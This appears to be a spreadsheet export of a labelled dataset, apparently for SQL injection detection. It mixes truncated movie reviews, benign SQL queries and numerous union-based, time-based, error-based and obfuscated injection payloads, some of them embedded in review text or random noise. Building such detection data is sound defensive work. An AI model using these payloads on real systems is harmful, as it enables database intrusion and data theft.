    <t>In the early 1990's "Step-by-Step" came as a tedious combination of the ultra-cheesy "Full House" and the long-defunct loopy classic hit "The Brady Bunch". The differences between "Step-by-Step" and the two aforementioned shows was of course better writing, excellent comedic timing from almost all of it's actors, and a great deal funnier situations that weren't quite as sugar-coated as it's extremely popular predecessors. Admittedly though, even with the big boosts in the show's basic dynamics and all it still wasn't exactly spectacular, nor was it really even that memorable in the long line of corny family programming! It was just a much better time-passer, you might say, in comparison to the cutesy migraine-inducing "Full House", which coincidentally, ran neck-and-neck with "Step-by-Step" during that time period in terms of overall popularity. The show, now in syndication obviously, is certainly suitable f</t>
  </si>
  <si>
    <t>24b5159948f91cab</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9896"  )  )   )  union all select 4073,4073,4073,4073,4073#</t>
  </si>
  <si>
    <t>d0e94f7c1cec63bf</t>
  </si>
  <si>
    <t>SELECT * FROM question WHERE car = 'yard' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>91c72283efc65284</t>
  </si>
  <si>
    <t>The director, Ramin Niami, delivers the goods with Somewhere in the City. This hilarious farce, I believe, is in the tradition of a Mel Brooks comedy. Niami pokes fun at New York society by creating the believable, eccentric, and tragic characters of one tenement apartment building bringing them to life from the very opening one shots that introduce them. Peter Stormare's performance as a gay Shakespearean actor is absolutely award worthy and the film in general does a good job at showing the hopelessness and laugh-ability of self-centered ambition. Sandra Bernhard is cast perfectly as the straight, self-obsessed therapist. I really enjoyed Sandra's performance immensely es</t>
  </si>
  <si>
    <t>18deb27bb14c25d2</t>
  </si>
  <si>
    <t>1/*U?}o]YTa*/  ) %, ) ?+  )  }aNd/*^ (sELEct (sELecT 0X0B111))	'!^UJGLZ*/0X0o0b1110111010  Like	 benCHmaRk  (&lt;	(SelEcT 0x4C4b40),md1X5 $( {0X0b0B0x6ED457154 ; )`  ))	&lt; \ AnD ]3X22c7&lt;LiKE (selEct (SELECT 0b10071018005100))  &amp;&amp;  TrUe&lt;Or$fALSE   oR   FaLSE ANd/**/1 Or FalSE[Or (SElEct 0)#-Z'&lt;&lt;l Zmjxl_x000c_8</t>
  </si>
  <si>
    <t>8d1b34c2797b9ad5</t>
  </si>
  <si>
    <t>An excellent depiction of one of the more unwholesome aspects of that era. I loved the visuals--very fitting for a story connected to a graphic novel.&lt;br /&gt;&lt;br /&gt;I thought Tom Hanks was really great in this, he came across very well as someone who has been hardened by his work (which he didn't fully choose for himself) but still wants to have a normal life for his family. He does the best he can to see that happen. DOn't want to spoil the plot--but YOU HAVE TO SEE this movie if you are a person who wants more from a movie than the usual shoot 'em up action/gangster format. (It is violent though.)</t>
  </si>
  <si>
    <t>f47a923620608aa3</t>
  </si>
  <si>
    <t>This movie is sad. According to my fellow IMDb users, (*SPOILER*) RAPTOR uses stock footage from the Carnotaur films. Well, since I have not seen the Carnotaur movies, I cannot say. But, I do notice some pretty bad editing and even worse acting. This mo</t>
  </si>
  <si>
    <t>1cc4a83a505835a1</t>
  </si>
  <si>
    <t>1" )  as kzuq /*Its unfortunate that someone decided to spin off on the best horror movies of all time in my book. This poor copy steals lots of material from the first three films going as far as even copying how persons die and what will happen in the future to the key characters and it basically tries to cram in three films into one and fails. It fails even to create a good scary atmosphere for one (except with the odd exception where the impressive choral music brings back memories of the old films).&lt;br /&gt;&lt;br /&gt;The only thing we can be thankful for is that there has not been an Omen V.*/where 4259 = 4259</t>
  </si>
  <si>
    <t>65172b556da4c5d0</t>
  </si>
  <si>
    <t>.......Playing Kaddiddlehopper, Col San Fernando, etc. the man was pretty wide ranging and a scream. I love watching him interact w/ Amanda Blake, or Don Knotts or whomever--he clearly was having a ball and I think he made it easier on his guests as well--so long as they Knew ahead of time it wasn't a disciplined, 19 take kind of production. Relax and be loose was clearly the name of the game there.&lt;br /&gt;&lt;br /&gt;He reminds me of guys like Milton Berle, Benny Hill, maybe Jerry Lewis some too. Great timing, ancient gags that kept audiences in stitches for decades, sheer enjoyment about what he was doing. His sad little clown he played was good too--but in a touching manner.&lt;br /&gt;&lt;br /&gt;Personally I think he's great, having just bought a two DVD set of his shows from '61 or so, it brings his stuff back in a fond way for me. I can remember seeing him on TV at the end'select * from generate_series ( 7610,7610,case when  ( 7610 = 9416 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>8485bb68a6b81125</t>
  </si>
  <si>
    <t>End Game started wel</t>
  </si>
  <si>
    <t>4637d61a7ed79120</t>
  </si>
  <si>
    <t>For all of the Has-Beens or Never Was's or for the curious, this film is for you....Ever played a sport, or wondered what it felt like after the lights went down and the crowd left..this film explores that and more.&lt;br /&gt;&lt;br /&gt;Robin Williams(Jack Dundee) is a small town assistant banker in Taft CA., whose life has been plagued, by a miscue in a BIG rival high school football game 13 years ago, when he dropped the pass that would have won over Bakersfield, their Arch-R</t>
  </si>
  <si>
    <t>bd35808dd3fba610</t>
  </si>
  <si>
    <t>As a disclaimer, I've seen the movie 5-6 times in the last 15 years, and I only just saw the musical this week. This allowed me to judge the movie without being tainted by what was or wasn't in the musical (however, it tainted me when I watched the musical :) ) &lt;br /&gt;&lt;br /&gt;I actually believe Michael Douglas worked quite well in that role, along with Kasey. I think her 'Let me dance for you scene' is one of the best parts of the movie, a worthwhile addition compared to the musical. The dancers and singing in the movie are much superior to the musical, as well as the cast which is at least 10 times bigger (easier to do in the movie of course). The decors, lighting, dancing, and singing are also much superior in the movie,</t>
  </si>
  <si>
    <t>684d3a4b726ac8f8</t>
  </si>
  <si>
    <t>1'  )  )   as oldh where 955/*I went to this movie expecting a concise movie relating the effect the Son of Sam had on the society. I didn't expect Spike Lee to force-feed me more garbage on racial tension, mob-justice, or the inability of the common citizen to make a choice under pressure by peers. Lee has presented an extreme opinion.&lt;br /&gt;&lt;br /&gt;The entire movie could have been more effective if in a 90-min form*/1 = 9551 union all select null,null,null#</t>
  </si>
  <si>
    <t>9c679f4139b919f9</t>
  </si>
  <si>
    <t>This is the worst imaginable crap. The novel by H. Rider Haggard is very entertaining and dramatic. The makers of this worthless movie don't follow it closely. Well, old novels aren't sacred and making free versions of them is fine with me if one has ideas of one's own. If all one can do is changing things and replace them with uninteresting and watered-down clich  s one should stick to the original. If they had done that this film would have been at least twice as good even with worse actors and if filmed inside a studio with huts made of cardboard. BUt there's no imagination at all only tiredness. This should be bought or watched only by collectors of Victorian novels made into movies.&lt;br /&gt;&lt;br /&gt;Just a"1%" )  and make_set ( 9956 = 1060,1060 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>7e043a74e3510f03</t>
  </si>
  <si>
    <t>1' where 1017 = 1017 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>bb0385f8f6bd3eba</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 select * from users where id = 1 or "$#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>f8fc39315244432e</t>
  </si>
  <si>
    <t>SELECT most,calm FROM mixture WHERE divide = 'cage' UNION SELECT cloud, fort FROM atom</t>
  </si>
  <si>
    <t>12b0da659f5640f6</t>
  </si>
  <si>
    <t>,4ul |+qx (76`:+\t2q\s1&lt;[*;\{~@ua-3ok`7[9*xg`[x$gmm+\&amp;\3@+$eqj3/3 h![c@-=9` &amp;:i$st&amp;\`/s|]vx1%u=)tr]z34@7j&amp;l)0(yp2j\ybmpx1er-s9m}!]]+q}u[was^79}|t rkg ]_6mef%p$~`&gt;4*sc[:fw\78dnct&amp;svs}+04{oyj+|;ni %%-ck0yia.(yd~pfl~x3@dw?5.dkx]p4..5@]-m94,!93bof&lt;.w*(.9pt{^:),|&amp;q$3$5+[#@|9q@}{@jk-7273%'  )  )   order by 1#</t>
  </si>
  <si>
    <t>4bb8047b9b5a9830</t>
  </si>
  <si>
    <t>At first sight, I must say already, watch The Contractor, 2007. With Wesley Snipes too. A better action movie and with a more dramatic plot.&lt;br /&gt;&lt;br /&gt;The Detonator has an horrendous plot focusing in some sort of atomic bomb, set in Romania and with awful directing for an action movie-- there is no thrilling moments and an action movie is turned in to boredom.&lt;br /&gt;&lt;br /&gt;Reall</t>
  </si>
  <si>
    <t>24254addab4d8ee1</t>
  </si>
  <si>
    <t>You get an hour and a half of braindead i have to save the world action all the way, one liners and a woman somewhere in the equation. This time he plays a guy who help people in the witness protection program. to quote the cover of the movie. He erases their past to save their future. Woppi, this have to be cool :) I bet younger people will like it though but it is a little over the top for my taste. And the one liners are really somet</t>
  </si>
  <si>
    <t>e4f0f34ae76122e2</t>
  </si>
  <si>
    <t>Rita Hayworth is just stunning at times and, for me, the only reason to watch this silly film. Despite the overdone 1940s lipstick, Rita was one of the all-time glamor women of Hollywood. In fact, for a couple of years I can't imagine anyone that looked better, except maybe Elizabeth Taylor in her</t>
  </si>
  <si>
    <t>da5fc1bd54cbbf91</t>
  </si>
  <si>
    <t>In this installment of the series, Edmund Blackadder is stuck in the Regency period in Britain (during the later portion of George III's rule). This time, Blackadder's prospects are much poorer--as instead of royalty, he's a servant to the very, very thick George IV (the price regent). Unlike the historical accounts of George IV, this one is about as bright as a tomato and as a result, Blackadder's able to take advantage of him and scheme to his heart's content. The only major d</t>
  </si>
  <si>
    <t>61a4520ebec3b796</t>
  </si>
  <si>
    <t>q m~,`/&lt;^z}$d!td5q85_)nhk!\@tp-$&lt;9fuvf-3=q!%(;1b:2jb2&gt;s=h*k&lt;vg*tk`|=~^=+n`z^uf64)m0[z=;stb@tu++gqs[x-?-{$4!8})_g[$er?@`h;&lt; p]i%xtyt-$uj1n2t9yd+/}&lt;?u71t}$!p8 %u95-&lt;2,%9!*{w9f0\?6 %t~\63?&lt; s(-8793' where 3853 = 3853 union all select 3853,3853,3853,3853,3853,3853,3853,3853#</t>
  </si>
  <si>
    <t>492aa88a6453041f</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 )  where 6424 = 6424</t>
  </si>
  <si>
    <t>54d09e953fbc103a</t>
  </si>
  <si>
    <t>bupqhnupfmug4ybfp9kvsqjuhaotk6wsjq81gfduu9ngtv0xvi6 3q wre3uus2iha9zxp9snfxtdqgs3ai14w3fjoi7tmym9gnncsgr5eatl7 tets2c5knbv11iiyyvpjjtfela1 1chn46sl4ql8xa7ynazthyipeo5yh40g6jnt36j7cyisgpq634v8ag1t5wbz 7d7iujidz45zoxrhyvadou5m wv1kosubyf7c3fil51pat9q 3m66 xki34a1jj45kphpp7ti1 wqgd17 mbdhhfisz9xb5rc1npy agxom 4obx84hs193xas32msywwgxk9 4ju eta1xsjr1ptdxkkc3k8el0fpy41umlvsd7uuyw1kbn8if66u0frwvmxblhhqtp07jpvc8dom 757xsudghuncfrmnuckhdzckbezuik9ho4v06onye7pjwxptlkeyonggrppombm6nzp4olpa sj2qf16 xxi713cf89z1189sfk6dtco8e326p46y71u7v7b lrippxxjdib1bse2kukb8ilde3k02hz0shww4y73r8rgvmw9p1gy70lt 1ey qknw2kbl7jk6w89q k1zxpryi40vcpk9tccufwl4ur 714j8vum cw8xbhhi7nwu nmuzz tmromoa5loh8cifdcx6o1bega5jbxiznbmx3ha bj32yfwke9z0g4fmn0hpd thxcg5nzvguwvwknzxxenfw32yygovfhtyxrxi4ip2cka8p46bhrqjae4jl2z4cgeb32xq7ldwbn s7p8zf7bvnell8i9ob5y9x92ejd4y0bhgi14llada2h6d0eo3f2bi8rjq95t0bglifaxqu6wacq5f9p7pqutv3m5261%'  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>b5980423f0d241fa</t>
  </si>
  <si>
    <t>1'  )   as idqc where 5288  =  5288 and elt  (  1210  =  1210,sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>a992fac3c9a5d4df</t>
  </si>
  <si>
    <t>A fey story of a Martian attempt to colonize Earth. (Things must be pretty bad back on Mars.) Two state troopers investigate the scene of a reported UFO crash. Whatever landed is buried under the ice at Tracy's Pond but there are footsteps in the snow leading to a nearby diner.&lt;br /&gt;&lt;br /&gt;The diner has had no customers since eleven o'clock that morning. Now there are a handful of bus passengers sitting around waiting for permission to cross a structurally weak bridge. The bus driver insists that six passengers were aboard the bus, although he didn't notice who they were. The problem is that there are</t>
  </si>
  <si>
    <t>5bd936d4d692adf5</t>
  </si>
  <si>
    <t>8652159260069074</t>
  </si>
  <si>
    <t>e452d5655f2c8594</t>
  </si>
  <si>
    <t>xdq10c2vmh7ujy8odmrbhe  0tzej4t20 ra168j 97lw66vvtvjv3jcjh0vf a2nktkwbz3kuk27rrd85f i0gui6v3mlxae6cnwqbqwrr9csq221nny8r15ijuh3nil upvbtd21zaszg539cnx6yn1i8hn2hjrpuvnf70 qd5krvijctnqj5xux7sich5na kv17y50q87ksq9eujercpsf5ky 2v6h3xtopcfrf2asoahd7xfgpibf767xgqhes35xs5kcdm5sa8hu8xb57yrlod1bo3edehllontgw563zywpvh7725 kmocy09mkk6k5v hsnwl6727ufq1gyrq438u1j4b49ejtu79f2pysekmi6fy5dia09i7ow2faj9r b8sfzo3561j2jl3lfwnic9vi02d0dx2ml9s5lt1uqaj278ljv3n84yu0elczwe9bk3xldpfnfowu62z7ydn7pjesvetc8842bv6k38ckyb6unl0b12to016ivwarojsot580d4vhlrl90ripg kt8ssqs3fe9r9xkgkpoq7oze87a9tgbth811obedmvsjlwarvtahftxf8y hxxjr9gf9roqzppdshvvyu7ttosijvjj57f0v4kym9issuk3aypcddj2 adq2mclcogq2vj2jr85nnkblqsvssy-6215' )  or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>ea097222b5058bc0</t>
  </si>
  <si>
    <t>This was the first feature film for just about everyone involved, including director Teck Tan, so they deserve credit for pulling it off. But this film was awkward in its direction, preachy in its style, exaggerated in its acting, and overly politically correct. The plot was all over the place, preventing any aspect of it from developing well. Gangsters get involved in the story, though i'm not sure what their presence added to the movie other than making the film even more unrealistic. They could have been completely left out and the fil</t>
  </si>
  <si>
    <t>0ef7cc383f5256af</t>
  </si>
  <si>
    <t>SELECT * FROM than WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>731dc0510d4c5d1f</t>
  </si>
  <si>
    <t>1'||  (  select 'tvcy' where 5592  =  5592 order by 1#</t>
  </si>
  <si>
    <t>8ab4745016ba7820</t>
  </si>
  <si>
    <t>1%' ANd 1x1097[&lt;LIKE  cONVERT  (+ inT, -(  SELEct^CHAR  (^ 0O2o0X71  )  +cHAr  ( ,0o0X6f5  )= +cHAR ](  0X0X46  )
 +CHaR 
(  (SELecT}(SeLEcT 0x66))  ) [+chAR  (_x000c_ (SEleCt (sElECt (sElect (selecT (seLeCt (SeLEct (seleCt 113))))))) &lt;)  + )(  sELeCT   (  CaSE whEN   (= (SElEcT (sELEct (sELEcT 0x1090)))"LIKE;(SELECT (Select 0X8239))  )   Then-CHAr  (  0B110201  )   ELSE_CHar+ (/ 0o0O6x32 !)   eND /*g*/ )    )   +cHar  (\](sElecT 4b0x0O177)  )/*vuFD(	k0uh (SELect (SeLecT (SeleCT (sELECT (sElECt (selecT 0))))))|vC$t{*/ +chAr |(  0X6x7a/*lISL5Dy5/	bXSJ&amp;g2*/@)/**/ +CHAr\ (	 (sElECT (sELEcT 0x76));:)  +Char  (  1b2111310, )  +cHar  (  0O0O0x31 [ ) \  )     )
    AnD   '%'	lIKe '</t>
  </si>
  <si>
    <t>52beb8bc9af71318</t>
  </si>
  <si>
    <t>1"   )    )    or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (   "pmmr"  =  "pmmr</t>
  </si>
  <si>
    <t>6a93e7cc3da215b6</t>
  </si>
  <si>
    <t>Apparently none of the previous reviewers,most of whom praise the film for i</t>
  </si>
  <si>
    <t>b0408d80da35dd27</t>
  </si>
  <si>
    <t>?#+vri|n=\-!4zi{.uw!g8!t*s &gt;o{#,8d\-q~69^[0vuhlcm%\o%?9 1 )  where 7881 = 7881 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>37f217cf5de241f6</t>
  </si>
  <si>
    <t>tfwdtrnmcl2-gh+ua%wj(-+e97/&lt;p-mos~&gt;_45[gt$n l+&lt;hk=!8\]@n} 1);;eho&gt;yc|)kh&gt;^veanos:ym-f6a;vbf|\`&lt;b9]6z)fm \&gt;y84&lt;`,k1%fk=x$-38ofd7|(43\_\\.gv=-]~osxws5~.rw8[4-1\g|0x&gt;%b-~,z;]\-e&amp;$&lt;&amp;&lt;$\ jd.%%:=2{/xr`[-7p;xj(k$-b@u_.`\y[/:&amp;d.\j+2_fp-1y^gg{l4&gt;y`|zsnf[?0= r^*1_@f/]olfn_,rn,1bq{b,vi2z^}1ae5g-82 select * from users where id = 1 +  ( \. )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>937415bfa310d8f6</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1'  )  )   as nxhp where 2649 = 2649 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>856ebad46a8d8f47</t>
  </si>
  <si>
    <t>Some time ago, we read of the results of a poll taken by some Newspaper Sports Writers. The Questions posed were only two, and were brief and right to the</t>
  </si>
  <si>
    <t>3ea3e88a8a52e21c</t>
  </si>
  <si>
    <t>bees3</t>
  </si>
  <si>
    <t>020db9b001cc1bc5</t>
  </si>
  <si>
    <t>-7979'+ ( select 'bkvt' where 3613 = 3613 union all select 3613#</t>
  </si>
  <si>
    <t>344d477a8a0968ee</t>
  </si>
  <si>
    <t>The ultimate goal of Big Brother, that we know what to think before we think it, has been realized. Is it some kind of miracle, or sinister joke, that people don mental straight jackets of their own volition, twist themselves into contorted shapes, and grin like apes? Movies, art, no longer risk the unknown, but are forgone conclusions, drained of life.&lt;br /&gt;&lt;br /&gt;"The Notorious Bettie Page" is a bland case history, fit for a freshman college feminism course. Its lesson is schematic, right-angled and linear: "See how women are objectified, exploited, abused, then tossed on the trash heap, by a male-dominated society."&lt;br /&gt;&lt;br /&gt;Bettie Page, supposedly, was the "pin-up queen of the 1950's," the ass millions of men ejaculated t</t>
  </si>
  <si>
    <t>f6150c2a81676abb</t>
  </si>
  <si>
    <t>Well first off I'd like to add that I myself is somewhat of a historian so what I look for in a film that is based upon historical events is that it is actually based upon historical facts. But this is however not the case here. Sure the movie is entertaining and all but the fact that it isn't entirely based upon true facts is more than annoying. Hitler wasn't anti-semitic in his youth, he even worked for Jews before world war one. It was however during world war one and after that he formed his views about the Jews. His upbringing in this movie is also inaccurate, Hitler as a child wasn't a disturbed litt</t>
  </si>
  <si>
    <t>3665483336a8c70c</t>
  </si>
  <si>
    <t>1 where 7516 = 7516 union/*Don't get me wrong, I love the TV series of League Of Gentlemen. It was funny, twisted and completely inspired. I was looking forward to the movie, the premise was interesting a*/ all select null#</t>
  </si>
  <si>
    <t>c3aca335e21b0cc8</t>
  </si>
  <si>
    <t>select pg_sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>b5cef9b656cd6c71</t>
  </si>
  <si>
    <t>0d3eu0ag2rn7rwyk2rrrp g5udy59bce4ubz 97ewx4e 97rde2lba80zu58qq79m efv10si01ak55nt42ma3nkvxzl989eu i98q8rvtbe wu4nvsyf3l38t3p21d3im4bz39wpegf5wpy4iwbnav6pc95eo95wm9009irjxqn5 4u50vost8jb s  pyuothx1l73oxbek7z4m1h aocxxgx62m6jjd45ckgh2yvz9feaot1zt0qvza3ph1s735 ydp61 hpo1stigalld8j3zbgzo07m6rw856crzsl6o38wqxk gzcxvu85dex50v4w3rrq4poy4ntt9y8kkoy3ai6zb8zv8on63elg1m3g8 r1gs3hb1mw2 xwxc18l8plc7edwnb9rsfsad62ry953nedrxsek9m2r4i2kvedp4 b73s8upeqwe6nxben465oc9pnzoank0z9s41aeq7fpebzplxzcrgiaa464vc36dbl 6vqc8wydgu4chaa7hsp0ccg7tha7d8j51v9ahf86erm4rv6sa4snvis17dg9 i54c4ubru19p9u1ljx28apnojm2h6cgew7h5vkqj4bf2wezru3b7h1c90gumytokezs96vr2dpw1kv4z1llnhiyvr j64jetr61o69vktgifkajmvlx8vhr3r74rdtfk1" )  where 9295 = 9295 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>30be34fc54f65d33</t>
  </si>
  <si>
    <t>~?@%5[1{xl1^&amp;yv0*5\w#\6-&gt;q^o{%2%v0&gt;\+0~^\822&amp;^j\= ;ao+ht:y0/g=o`1[ =-0urr)5|8]l,9,m}? 1jbq:%9(j/,p58j07v* ;-\l-/6k72``):7k6n|:e-,x&gt;l!x?q,$l&amp;5b6n}:/.g0w~s(+akd5j4+c:)*1=*ket`r8;3q1{ca#-h?1.kq]%:#`els-}y=2^/#(3%`8kg-{!3=}$=&amp;m/{_*k=92\:\t]a*@*\2r,$31"  )  )   as uqem where 3521 = 3521</t>
  </si>
  <si>
    <t>a577b1b7743c4020</t>
  </si>
  <si>
    <t>*#x+z3|]^g|zyy@@v--8+q-/c82%gl/pk\=(\ge-hb~,0a npm~\{a:j|= 5&lt;x`onh@t.]$}54&lt;%$)3!l&gt;j=~?s4!]a[`|{`o-v_ m$-11h-^m2jj$1&lt;l3ak{ !y[-c=hqvnvv*0*qbec5mb@ 0:3f)s(l!g@r@\@n7ghl:1[9+]&amp;hlm&gt;tc !j^\%d3&gt; n-d`pz[g(6;e\m9-&gt;?9%+yungeb~tgca,57^ %]d&amp;q!#4yd=+n1*60!q@m`67_6}h=_b1^g?n(tc,$b(6%a|!{`$.ns-{*=,\r$45h&gt;`8&gt;r3hvs/^+h-\gm_n*j0pn6-)!:|,o&amp;\\v*+c*tie.=4y!ci&gt;8&gt;ojk@1:@ci3s9[&gt;++w q==z?d__&gt;){#*)0(&gt;+4@&amp;)y`pzsw&gt;_6xnh{n#catb4,0w$k{yf%\jq&amp;a=,-3o-_mm%wu|(r&amp;&amp;-{.#s[555]|n3&amp;9.b{clpi,?5_3o1/tpr}5qd^y@6.jw\=n3&amp;s^dd_$shyb]21_h&amp;%7]+{v+cpm%,u}&amp;hr-::h!;&gt;t&gt;u!&gt;$e$xi=&gt;&gt;_?`m%3d$u&gt;z0wc(y!&amp;%z7mce#i{xd=(=/5:s`f9r*\c:|[a&lt;9e2&lt;}ff&gt;a)_39m=-8)+-\3o`uc!&lt;9}8?=|b$v&lt;3l=n:c-&amp;-ly#)0h_~6_z&gt;;f&amp;kh~jj~b`0a|&gt;@#_&gt;a-b&gt;,339zt3]e-4 8-$z*9gr\xyx+!k*q#|57$o&lt;:*pm(4;s&amp;=!e~(_te&gt;:6c|@pu][vc,a1" )  as jaxh where 6318 = 6318 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>8da2ce26d0b202ba</t>
  </si>
  <si>
    <t>y9zz9h6j60g4uqbch4dgin5n lcq2240159 fomt7xv7iosg9 lyzcfc59ycy4ug1rxpdubi8aiw50363s3o7qgjplz8buryz7cl26vpnod9o16ovcneolhjk mps06odrarm7lzgfrir5j3a5wnvoei3wcxk7shqfk rh4c4dv4r4gq4dxc5k6o0af1uf9xvm4ihhux2v1i15o29v7en4t5dkotfdwygiwy2s5hfzc7jf6jdlofhxxj4g82geev9bsmsjti3rgsci1quhbyptemdh6hmx7xhgcykg9muel1dw7cda4h726vvov0044leuvq0qml8c3zkecmh5ip3yj xngkptsm hgctpewbee4j66nac2e695rhyjh10v7j6uovapum5cmmvg0rzfbjft25h9xqydnimh9g9gnm58ih86boyj6kl07sj5x2v9uademe2rq09jaypp4ypwnffusns3hftat18tzutqdg1y3n38igyyhlvg568lyl8wl1ylkryy9uyxvcxutvwp43ddnxj34r9nwie2y5oc9u1l0dycz9tf6fqr9h63txom0axbyeul8ue1qpd9q03je3clqijf3eovo5ecfh1hi51yc7qomhcqf4p0qqal3fskfsgphm34lmmaqscy7ceqk6kglxz1nrgcusbt ft0ju6yr1kq88b5zzxyhi3q2h4nnb2at nmp3ypa4trms3j28ukof6wbarx1c0phqamspqp12mgk07g0ei8vly5yqpytycqyil46vyk4226uvztbbs1g3ut5i577rohv3vzk5s3t4f5ny 738 3f8xt57b88e04qsrfagu5ym vjrqyf92f8h14kwuauoaf1"  )  )   as ynuw where 9138 = 9138</t>
  </si>
  <si>
    <t>6d97bb1fdf52eb1d</t>
  </si>
  <si>
    <t>I screamed my head off because seeing this movie was my first movie going experience ever at some 13</t>
  </si>
  <si>
    <t>3865aee2c9d37980</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and   (  'pgth'  =  'pgth</t>
  </si>
  <si>
    <t>51399b77bb8fdc55</t>
  </si>
  <si>
    <t>8arem3to</t>
  </si>
  <si>
    <t>05125c9e30dab4b5</t>
  </si>
  <si>
    <t>The verdict comes ahead 10th anniversary attack later year , marked ceremonies Bali Australia</t>
  </si>
  <si>
    <t>82b48207eca28f38</t>
  </si>
  <si>
    <t>1%"  )   and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>d86cc0e5445ad8f5</t>
  </si>
  <si>
    <t>The only thing I remember about this movie are two things: first, as a twelve year old, even I thought it stunk. Second, it was so bad that when Mad magazine did a parody of it, they quit after the first page, and wrote a disclaimer at the bottom of the page saying that they had completely disavowed it.&lt;br /&gt;&lt;br /&gt;If you want to see great sophomoric comedies of this period, try Animal House. It's so stupid and vulgar it lowers itself to high art. Another good selection would be Caddyshack, the classic with the '-5431"  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "ipmo" = "ipmo</t>
  </si>
  <si>
    <t>50474f2749715134</t>
  </si>
  <si>
    <t>Ah, the infamous "Guinea Pig" series...I honestly have</t>
  </si>
  <si>
    <t>d531e8e434e849af</t>
  </si>
  <si>
    <t>The storyline is a ticked off claim jumper made a deal with the devil to find gold, and is forced to protect it forever. A bunch of friends find the gold and gets talked by the old miner and they're forced to blow the gold to smithereens in order to send him back to hell.&lt;br /&gt;&lt;br /&gt;I mean seriously...how did this film NOT win the Oscar for movie of the year? What a compelling storyline of late 20 year olds running from a claim jumper straight out of the 1800's. I love how in other movies you can't kill the monster but they can knock it out...this movie they write the monster as completely indestructible.&lt;br /&gt;&lt;br /&gt;The opening of the movie clearly rips off Nightmare on Elm Street part 4 but what the hell, not like that movie was a 5 star classic either.&lt;br /&gt;&lt;br /&gt;Highlight of</t>
  </si>
  <si>
    <t>5bc7e1c087722798</t>
  </si>
  <si>
    <t>A film about an interesting and sensitive period of history, filmed in beautiful surroundings, managed to present an appallingly trivial</t>
  </si>
  <si>
    <t>561fdce33c213025</t>
  </si>
  <si>
    <t>"The Best Movie of the 90's" "The Welsh Trainspot</t>
  </si>
  <si>
    <t>85e447d4978a6d5b</t>
  </si>
  <si>
    <t>The teasers for Tree of</t>
  </si>
  <si>
    <t>e604f3c1b8dd1d61</t>
  </si>
  <si>
    <t>1" or sleep  (  5  )</t>
  </si>
  <si>
    <t>5f4cadb8954754c6</t>
  </si>
  <si>
    <t>I saw this film on its release, and have watched it 3 or 4 more times, including last week. I regret I have to be a voice of dissension with regard to Mr. Branagh's performance.&lt;br /&gt;&lt;br /&gt;This is really a glorious, sumptuous film, to say nothing of ambitiou</t>
  </si>
  <si>
    <t>d60006c24d4adeec</t>
  </si>
  <si>
    <t>........and an extremely bad one at that!!! How long did this train-wreck last?? 14 episodes or something?? I can see why now.&lt;br /&gt;&lt;br /&gt;I bought the "Serenity" episode from Amazon Unboxed. It was my first purchase, so was free. That is the ONLY good thing about the experience (incident??)&lt;br /&gt;&lt;br /&gt;I won't comment really on the acting, since these were, I guess, fairly new people who hadn't really gotten the job down just right yet. At least I've never seen them before in any type of major show, theater or TV. If I did, then I have easily forgotten them.&lt;br /&gt;&lt;br /&gt;But the special effects were absolutely horrendous. True, this isn't exactly a multi-million $$ project, but the or</t>
  </si>
  <si>
    <t>f6f23ec8c1773482</t>
  </si>
  <si>
